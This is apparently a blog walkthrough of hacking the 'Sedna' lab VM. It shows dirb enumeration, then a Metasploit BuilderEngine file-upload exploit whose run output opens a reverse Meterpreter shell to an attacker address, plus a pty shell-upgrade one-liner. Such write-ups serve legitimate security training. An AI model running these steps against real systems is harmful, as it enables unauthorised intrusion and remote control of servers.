Credits to Viper for contributing this fantastic VM. If you are interested, you can d/l it here.
1. Start with a port scan, try to play around with the nmap flags, look out for port knocking, as some hosts will only reveal if you scan it in a certain sequence.
2. Rule of thumb, if you see a web port, enumerate it, because this is where you are most likely to find some good stuff on it. Also, it is easier to enumerate than other services. We all use web for browsing so it is natural. Always go for low hanging fruits.
dirb http://192.168.0.113/ -w -o dirb.txt
----------------- DIRB v2.22 By The Dark Raver ----------------- OUTPUT_FILE: dirb.txt START_TIME: Wed Jun 14 11:30:51 2017 URL_BASE: http://192.168.0.113/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt OPTION: Not Stoping on warning messages ----------------- GENERATED WORDS: 4614 ---- Scanning URL: http://192.168.0.113/ ---- ==> DIRECTORY: http://192.168.0.113/blocks/ ==> DIRECTORY: http://192.168.0.113/files/ + http://192.168.0.113/index.html (CODE:200|SIZE:101) ==> DIRECTORY: http://192.168.0.113/modules/ + http://192.168.0.113/robots.txt (CODE:200|SIZE:36) + http://192.168.0.113/server-status (CODE:403|SIZE:293) ==> DIRECTORY: http://192.168.0.113/system/ ==> DIRECTORY: http://192.168.0.113/themes/
<--snip--snip-->
3. Found BuilderEngine at http://192.168.0.113/modules/builder_market/license.txt
4. I found 2 exploits on exploit-db.com, took the easy way and used the msf module :-). You can d/l it here.
msf exploit(42025) > info Name: BuilderEngine Arbitrary File Upload Vulnerability and execution Module: exploit/linux/misc/42025 Platform: PHP Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Disclosed: 2016-09-18 Provided by: metanubix Marco Rivoli Available targets: Id Name -- ---- 0 BuilderEngine 3.5.0 Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 192.168.0.113 yes The target address RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The base path to BuilderEngine VHOST no HTTP server virtual host Payload information: Avoid: 1 characters Description: This module exploits a vulnerability found in BuilderEngine 3.5.0 via elFinder 2.0. The jquery-file-upload plugin can be abused to upload a malicious file, which would result in arbitrary remote code execution under the context of the web server. References: https://www.exploit-db.com/exploits/40390 msf exploit(42025) > run [*] Started reverse TCP handler on 192.168.0.182:4444 [+] Our payload is at: OccVNRFDJjYA.php. Calling payload... [*] Calling payload... [*] Sending stage (33986 bytes) to 192.168.0.113 [*] Meterpreter session 1 opened (192.168.0.182:4444 -> 192.168.0.113:51443) at 2017-06-14 12:14:42 +0800 [+] Deleted OccVNRFDJjYA.php id meterpreter > shell Process 12629 created. Channel 0 created. id uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@Sedna:/tmp$
5. Now for the privilege escalation part, I've been trying various overflayfs exploits
but none seem to work because the /bin/su was removed. After some gooling for ubuntu 14.04
local priv exploits, I found the apport package to be vulnerable. You can d/l it here.
No comments:
Post a Comment